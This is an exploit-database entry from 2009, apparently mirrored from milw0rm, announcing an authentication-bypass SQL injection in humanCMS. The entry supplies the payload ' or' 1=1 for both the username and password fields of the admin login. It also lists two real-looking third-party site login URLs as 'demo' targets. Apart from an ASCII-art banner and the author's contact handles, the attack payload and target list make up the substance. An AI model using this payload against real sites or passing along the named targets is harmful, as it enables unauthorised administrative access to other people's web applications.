humanCMS - Authentication Bypass

Author: next
type: webapps
platform: php
port: 
date_added: 2009-08-23 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
()                                                                                                    ()
()    f KHatr Zfaft Zenta9 f Zfaft Galo ya khir CHirbakhzer                                           ()
()                                                                                                    ()
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
[+]  humanCMS   (Auth Bypass)  SQL Injection Vulnerability
[+]  Discovered by  next
[+]  www.sa3eka.com   ()()()()()  www.m4r0c-s3curity.cc
[+] vie.0[at]hotmail.com
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

[+]  Home Page      :      http://www.squarelabel.com
                           "humanCMS site description"

[+]  Auth Bypass

[+] expolit    :           username :     ' or' 1=1
                           password :      ' or' 1=1

[+] admin login demo :
                           http://www.festivalcite.ch/index.php?id=&action=login
                           http://www.squarelabel.com/index.php?id=&action=login

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

# milw0rm.com [2009-08-24]